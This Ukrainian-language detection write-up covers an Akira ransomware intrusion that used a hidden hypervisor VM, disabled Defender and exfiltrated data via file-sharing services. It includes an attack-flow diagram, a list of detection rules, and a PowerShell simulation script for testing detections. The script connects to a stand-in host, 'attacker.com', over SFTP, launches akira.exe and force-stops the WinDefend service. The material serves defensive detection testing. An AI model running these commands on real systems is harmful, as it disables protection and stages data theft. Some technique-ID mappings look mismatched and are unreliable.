Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Одному з афілійованих суб’єктів програми-здирника Akira вдалося отримати несанкціонований доступ до гіпервізора і створити нову віртуальну машину для використання як приховане середовище. Зловмисник використовував цю ізольовану віртуальну машину, щоб уникнути моніторингу безпеки, підготувати дані за допомогою WinRAR і ексфільтрувати архіви через платформу обміну файлами Easyupload.io. Цей випадок демонструє, як загрози продовжують зловживати легітимними сервісами завантажень для крадіжки даних.
Розслідування
Розслідування поєднало телеметрію EDR, Windows Event Logs і історію браузера Microsoft Edge для реконструкції вторгнення. Аналітики також відновили VHDX-образ бірюзійної віртуальної машини, що виявило відключення зловмисником Microsoft Defender і налаштування операції програмного забезпечення Akira. Судовий аналіз віртуальної машини розкрив точні інструменти, веб-сайти та робочий потік, використані під час стадій підготовки і ексфільтрації.
Запобігання
Організації повинні контролювати появу нових або несанкціонованих кінцевих точок і віртуальних машин в їх середовищі. Сильна видимість віддаленого доступу до критичних систем, таких як гіпервізори та контролери домену, є необхідною. Також важливо обмежити або ретельно контролювати доступ до відомих сервісів обміну файлами і швидкого завантаження, які можуть використовуватися для ексфільтрації.
Відповідь
Якщо виявлено несанкціонований доступ до гіпервізора, негайно ізолюйте відповідний гіпервізор та будь-які новостворені віртуальні машини. Проведіть судовий аналіз образів дисків віртуальних машин, щоб визначити ступінь підготовки та ексфільтрації даних. Перевірте журнали доступу для простеження початкової точки входу та підтвердьте, що постійного доступу атакуючого більше немає.
graph TB %% Визначення класів classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% Фаза початкового доступу action_access[“<b>Дія</b> – <b>T1563.002 та T1021</b><br/>Несанкціонований доступ через віддалені служби<br/>та перехоплення сесій із ціллю<br/>контролера домену та гіпервізора.”] class action_access action %% Фаза розвідки action_recon_ad[“<b>Дія</b> – <b>T1087 та T1681</b><br/>Розвідка шляхом перерахування<br/>користувачів і комп’ютерів Active Directory.”] class action_recon_ad action action_recon_soft[“<b>Дія</b> – <b>T1592.002</b><br/>Збір інформації про<br/>програмне забезпечення хоста.”] class action_recon_soft action %% Ухилення від захисту та підготовка action_hide_artifact[“<b>Дія</b> – <b>T1564.006</b><br/>Приховування артефактів шляхом запуску<br/>нового віртуального екземпляра на гіпервізорі<br/>для обходу агентів безпеки.”] class action_hide_artifact action action_disable_defender[“<b>Дія</b> – <b>T1685</b><br/>Послаблення захисту шляхом вимкнення<br/>Microsoft Defender у новій віртуальній машині.”] class action_disable_defender defense %% Бічне переміщення та збір даних action_lateral_move[“<b>Дія</b> – <b>T1080</b><br/>Бічне переміщення до<br/>файлового сервера організації.”] class action_lateral_move action tool_winrar[“<b>Інструмент</b> – <b>Назва</b>: WinRAR<br/><b>Опис</b>: Використовується для архівації<br/>конфіденційних файлів у спільних папках.”] class tool_winrar tool action_collect_data[“<b>Дія</b> – <b>T1560</b><br/>Збір даних шляхом архівації<br/>конфіденційних файлів.”] class action_collect_data action %% Фаза ексфільтрації action_stage_data[“<b>Дія</b> – <b>T1074.002</b><br/>Проміжне зберігання архівів<br/>перед ексфільтрацією.”] class action_stage_data action action_move_tools[“<b>Дія</b> – <b>T1570</b><br/>Передача інструментів для переміщення<br/>атакуючих засобів у середовище.”] class action_move_tools action tool_winscp[“<b>Інструмент</b> – <b>Назва</b>: WinSCP<br/><b>Опис</b>: Використовується<br/>для передачі даних.”] class tool_winscp tool tool_easyupload[“<b>Інструмент</b> – <b>Назва</b>: Easyupload.io / LimeWire<br/><b>Опис</b>: Веб-сервіс передачі файлів,<br/>який використовується для ексфільтрації.”] class tool_easyupload tool action_exfiltrate[“<b>Дія</b> – <b>T1071.002 та T1105</b><br/>Ексфільтрація через веб-сервіси<br/>та протоколи передачі файлів.”] class action_exfiltrate action %% Фаза впливу malware_akira[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: Akira ransomware<br/><b>Файл</b>: akira.exe<br/><b>Опис</b>: Шифрує файли на<br/>підключених мережевих ресурсах.”] class malware_akira malware action_impact[“<b>Дія</b> – <b>T1486</b><br/>Вплив через шифрування даних.”] class action_impact action %% Потік з’єднань action_access –>|призводить_до| action_recon_ad action_access –>|призводить_до| action_recon_soft action_recon_ad –>|призводить_до| action_hide_artifact action_recon_soft –>|призводить_до| action_hide_artifact action_hide_artifact –>|призводить_до| action_disable_defender action_disable_defender –>|призводить_до| action_lateral_move action_lateral_move –>|призводить_до| action_collect_data action_collect_data –>|використовує| tool_winrar action_collect_data –>|призводить_до| action_stage_data action_stage_data –>|призводить_до| action_move_tools action_move_tools –>|призводить_до| action_exfiltrate action_exfiltrate –>|використовує| tool_winscp action_exfiltrate –>|використовує| tool_easyupload action_exfiltrate –>|призводить_до| malware_akira malware_akira –>|призводить_до| action_impact
Потік Атаки
Виявлення
LOLBAS Finger (через командний рядок)
Переглянути
Можливе впровадження / ексфільтрація / C2 даних через сторонні служби / інструменти (через командний рядок)
Переглянути
Можливе впровадження / ексфільтрація / C2 даних через сторонні служби / інструменти (через проксі)
Переглянути
Можливе впровадження / ексфільтрація / C2 даних через сторонні служби / інструменти (через DNS)
Переглянути
Атака програмою-здирником Akira через нову віртуальну машину та ексфільтрацію даних [створення процесів Windows]
Переглянути
Виконання симуляції
Попередня умова: перевірка телеметрії та базового рівня повинна пройти успішно.
Пояснення: цей розділ детально описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив МАЮТЬ точно відображати визначені TTP і мають виконувати саме ту телеметрію, яка очікується логікою виявлення. Абстрактні або не пов’язані приклади призведуть до помилкових діагнозів.
-
Нарратив та команди атаки: Зловмисник отримав початковий доступ і прагне збільшити вплив. Спочатку проводиться перерахування чутливих файлів шляхом перевірки відомих текстових файлів, таких як
AdUsers.txt. Щоб підготуватися до ексфільтрації, вони використовуютьWinRAR.exeдля стиснення даних. Потім готують їх інструмент для ексфільтрації,WinSCP.exe, і нарешті виконуютьakira.exeнавантку програмного забезпечення-здирника. Щоб запобігти зупиненню процесу EDR/Антивірусом, вони намагаються зупинити сервісWindefend. Ця конкретна послідовність аргументів командного рядка та змін стану служб призначена для виклику логіки виявлення специфічної для Akira. -
Скрипт для регресійного тесту:
# Скрипт симуляції для перевірки виявлення програмного забезпечення Akira # ПРИМІТКА: цей скрипт вимагає адміністративних привілеїв для зупинки сервісу Defender. Write-Host "[+] Початок симуляції Akira Ransomware..." -ForegroundColor Cyan # 1. Симуляція виявлення/перерахування (T1119) Write-Host "[+] Крок 1: імітація перерахування файлів через Notepad..." Start-Process notepad.exe -ArgumentList "AdUsers.txt" Start-Sleep -Seconds 2 # 2. Симуляція архівування даних (T1560.003) # Примітка: ми припускаємо, що WinRAR присутній, або імітуємо активність командного рядка Write-Host "[+] Крок 2: Імітація архівування даних за допомогою WinRAR..." Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt" Start-Sleep -Seconds 2 # 3. Імітація підготовки інструмента для ексфільтрації (T1105) Write-Host "[+] Крок 3: Імітація виконання інструмента ексфільтрації..." Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com" Start-Sleep -Seconds 2 # 4. Симуляція виконання програмного забезпечення-здирника (T1204.002) Write-Host "[+] Крок 4: Імітація виконання навантаження Akira..." Start-Process "akira.exe" Start-Sleep -Seconds 2 # 5. Симуляція відключення Defender (T1564.006) # Це викликає EventID 7036 в системному логi Write-Host "[+] Крок 5: Спроба зупинки Microsoft Defender..." Stop-Service -Name "Windefend" -Force Write-Host "[+] Симуляція завершена. Перевірте SIEM на предмет сповіщень." -ForegroundColor Green -
Команди очищення:
# Скрипт очищення Write-Host "[+] Очищення артефактів симуляції..." -ForegroundColor Cyan # Перезапуск сервісу Defender Start-Service -Name "Windefend" # Видалення симульованих файлів Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue Write-Host "[+] Очищення завершено." -ForegroundColor Green